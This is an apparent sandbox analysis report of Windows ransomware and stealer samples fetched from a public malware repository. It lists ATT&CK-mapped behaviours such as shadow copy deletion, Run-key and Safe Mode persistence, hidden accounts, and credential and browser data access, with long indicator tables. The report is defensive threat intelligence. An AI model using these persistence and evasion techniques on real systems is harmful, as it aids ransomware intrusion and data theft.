dharma | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Analysis

max time kernel
238s
max time network
238s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
22/03/2025, 19:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

dharma credential_access defense_evasion discovery execution impact lateral_movement persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Dharma family
dharma
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
19548	net.exe
19416	net1.exe

Renames multiple (777) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Downloads MZ/PE file 4 IoCs

flow	pid	Process
29	4944	chrome.exe
29	4944	chrome.exe
29	4944	chrome.exe
29	4944	chrome.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
19280	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
19268	attrib.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\fxjnezxxrlojtc\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\fxjnezxxrlojtc.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ggdovbpwdcbglnn\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\ggdovbpwdcbglnn.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dkgqocbwgndcpsaz\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\dkgqocbwgndcpsaz.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\aybokwgksvgymaeja\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\aybokwgksvgymaeja.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mtjsnetwrmizhd\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mtjsnetwrmizhd.sys"	mssql.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f83961e1.exe	explorer.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f83961e1.exe	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f83961e1.exe.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f83961e1.exe.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe

Executes dropped EXE 12 IoCs

pid	Process
1976	CryptoWall.exe
1616	CoronaVirus.exe
11212	chrome.exe
14904	chrome.exe
14756	chrome.exe
14552	chrome.exe
14252	Fantom.exe
17724	Dharma.exe
18512	nc123.exe
18580	mssql.exe
18644	mssql2.exe
18960	SearchHost.exe

Impair Defenses: Safe Mode Boot 1 TTPs 10 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DKGQOCBWGNDCPSAZ.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\aybokwgksvgymaeja.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\mtjsnetwrmizhd.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\MTJSNETWRMIZHD.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\fxjnezxxrlojtc.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ggdovbpwdcbglnn.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dkgqocbwgndcpsaz.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\AYBOKWGKSVGYMAEJA.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\FXJNEZXXRLOJTC.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\GGDOVBPWDCBGLNN.SYS	mssql.exe

Loads dropped DLL 6 IoCs

pid	Process
11212	chrome.exe
11212	chrome.exe
11212	chrome.exe
14904	chrome.exe
14756	chrome.exe
14552	chrome.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe"	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""	CoronaVirus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000\Software\Microsoft\Windows\CurrentVersion\Run\f83961e = "C:\\f83961e1\\f83961e1.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*83961e = "C:\\f83961e1\\f83961e1.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000\Software\Microsoft\Windows\CurrentVersion\Run\f83961e1 = "C:\\Users\\Admin\\AppData\\Roaming\\f83961e1.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*83961e1 = "C:\\Users\\Admin\\AppData\\Roaming\\f83961e1.exe"	explorer.exe

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1736937623-2710279395-1526620350-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	CoronaVirus.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1736937623-2710279395-1526620350-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	CoronaVirus.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
28	raw.githubusercontent.com
29	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-addr.es
33	ip-addr.es
53	ip-addr.es

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\CoronaVirus.exe	CoronaVirus.exe
File created	C:\Windows\System32\Info.hta	CoronaVirus.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Assets\contrast-white\FeedbackHubWideTile.scale-200.png	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig-office.xrm-ms.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.FileSystem.Watcher.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\net.properties.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-timezone-l1-1-0.dll	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\ReachFramework.resources.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\t2k.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-ul-oob.xrm-ms.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-pl.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\NewsSplashScreen.scale-200_contrast-black.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-150.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-ul-oob.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeSmallTile.scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll	CoronaVirus.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\librtp_plugin.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\System.Globalization.Extensions.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\VPRTColorVertexShader.cso	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.Windows.Input.Manipulations.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-ul-oob.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ppd.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_1.0.38.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSplashScreen.scale-125_contrast-black.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1	CoronaVirus.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\fr-CA.pak.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Threading.ThreadPool.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl\System.Windows.Input.Manipulations.resources.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ppd.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\BlurredGradientBackground.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib-amd\memoize.js	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_retina.png.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig.DATA.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\sl-SI\tipresx.dll.mui	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\vstoee90.tlb.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\System.Xaml.resources.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@fluentui\dom-utilities\lib-commonjs\version.js	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_BypassTrial180-ppd.xrm-ms.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial-ul-oob.xrm-ms.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-200_contrast-white.png	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\PRISTINA.TTF.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\ui-strings.js.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\msvcp140_codecvt_ids.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Xml.Linq.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL077.XML	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons_retina.png	CoronaVirus.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\liboldmovie_plugin.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-60_contrast-black.png	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\clretwrc.dll	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-multibyte-l1-1-0.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.GetHelp_10.2008.32311.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\GetHelpSplashScreen.scale-125_contrast-white.png	CoronaVirus.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\msedge_100_percent.pak	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\PresentationFramework.Aero2.dll.id-11F6F792.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\STSLIST.CHM	CoronaVirus.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
19348	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 4 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\CryptoWall.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\CoronaVirus.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Fantom.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Dharma.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
